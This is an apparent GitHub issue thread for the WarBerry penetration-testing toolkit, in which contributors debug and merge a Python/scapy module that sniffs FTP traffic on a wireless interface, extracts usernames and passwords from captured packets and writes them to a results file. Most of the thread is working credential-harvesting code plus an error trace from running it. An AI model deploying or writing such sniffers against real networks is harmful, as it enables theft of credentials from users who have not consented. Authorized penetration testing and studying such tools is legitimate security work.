Closed ghost closed 7 years ago
nice one mate. i will test and incorporate
it works sometimes and sometimes it fails with the following error
[ FTP CREDS SNIFFER MODULE ]
[*] Sniffing for 20 seconds on interface wlan0
Traceback (most recent call last):
  File "warberry.py", line 313, in <module>
    main()
  File "warberry.py", line 161, in main
    ftp_creds(iface, expire)
  File "/home/pi/WarBerry/warberry/src/core/enumeration/ftppwn.py", line 26, in ftp_creds
    sniff(filter='tcp port 21', prn=ftpSniff, timeout=expire, iface=iface)
  File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 586, in sniff
    r = prn(p)
  File "/home/pi/WarBerry/warberry/src/core/enumeration/ftppwn.py", line 10, in ftpSniff
    user = re.findall('(?i)USER (.*)'.raw) # username
AttributeError: 'str' object has no attribute 'raw'
I changed your code as following
>
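def ftpSniff(pkt):
    """Scapy ``prn`` callback: log FTP USER/PASS commands found in *pkt*.

    FTP sends the USER and PASS commands unencrypted, so they are readable
    in any capture of TCP port 21 traffic. Each match is printed and
    appended to ``../Results/ftpcreds`` as ``<destination ip> <value>``.

    Args:
        pkt: a packet handed over by scapy's ``sniff``.
    """
    ip_layer = pkt.getlayer(IP)
    if ip_layer is None:
        # getlayer() returns None when the packet carries no IP layer;
        # without this guard the .dst access would abort the whole sniff.
        return
    # The original assigned `dest` but read `dst`, which raised NameError.
    dst = ip_layer.dst
    raw = pkt.sprintf('%Raw.load%')
    # The pattern and the payload are two arguments to findall; the original
    # wrote `'...'.raw`, an attribute access on the pattern string, which is
    # the AttributeError ("'str' object has no attribute 'raw'").
    user = re.findall('(?i)USER (.*)', raw)  # username
    passwd = re.findall('(?i)PASS (.*)', raw)  # password
    if user:
        print(bcolors.OKGREEN + "[+] Detected FTP login to: " + str(dst) + bcolors.ENDC)
        print("[!] User account: " + str(user[0]))
        entry = str(dst) + " " + str(user[0])
    elif passwd:
        print("[!] Password: " + str(passwd[0]))
        entry = str(dst) + " " + str(passwd[0])
    else:
        # Nothing of interest in this packet: leave the results file alone.
        return
    # USER and PASS arrive in separate packets. Opening with 'w' on every
    # packet truncated the file each time, so the two lines of one login
    # could never both be kept; append instead. The file holds captured
    # secrets, so it is created readable by its owner only.
    fd = os.open('../Results/ftpcreds', os.O_WRONLY | os.O_APPEND | os.O_CREAT, 0o600)
    with os.fdopen(fd, 'a') as ftpcreds:
        ftpcreds.write(entry + "\n")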
>
>
def ftp_creds(iface, expire):
    """Sniff FTP control traffic on *iface* for *expire* seconds.

    Prints the module banner, passes every packet matching the capture
    filter ``tcp port 21`` to ``ftpSniff``, and prints a completion message
    once the timeout is reached.

    Args:
        iface: name of the network interface to capture on.
        expire: capture duration in seconds (formatted with ``%d``).
    """
    green = bcolors.OKGREEN
    reset = bcolors.ENDC
    print(" ")
    print(green + " [ FTP CREDS SNIFFER MODULE ]\n" + reset)
    print('[*] Sniffing for %d seconds on interface %s' % (expire, iface))
    sniff(filter='tcp port 21', prn=ftpSniff, timeout=expire, iface=iface)
    # NOTE(review): the path printed here differs from '../Results/ftpcreds',
    # the path ftpSniff writes to - confirm which one is intended.
    summary = "".join([
        green, "[+] ", reset,
        "Capture Completed.", reset,
        " Results saved at ",
        green, "../WarBerry/Results/ftpcreds!\n", reset,
    ])
    print(summary)
>
>
Looks good to me :)
passed on for later releases
Adds a module to sniff FTP credentials for the number of seconds given by the `expire` variable, on the interface given by the `iface` variable. The original script is available on my Github.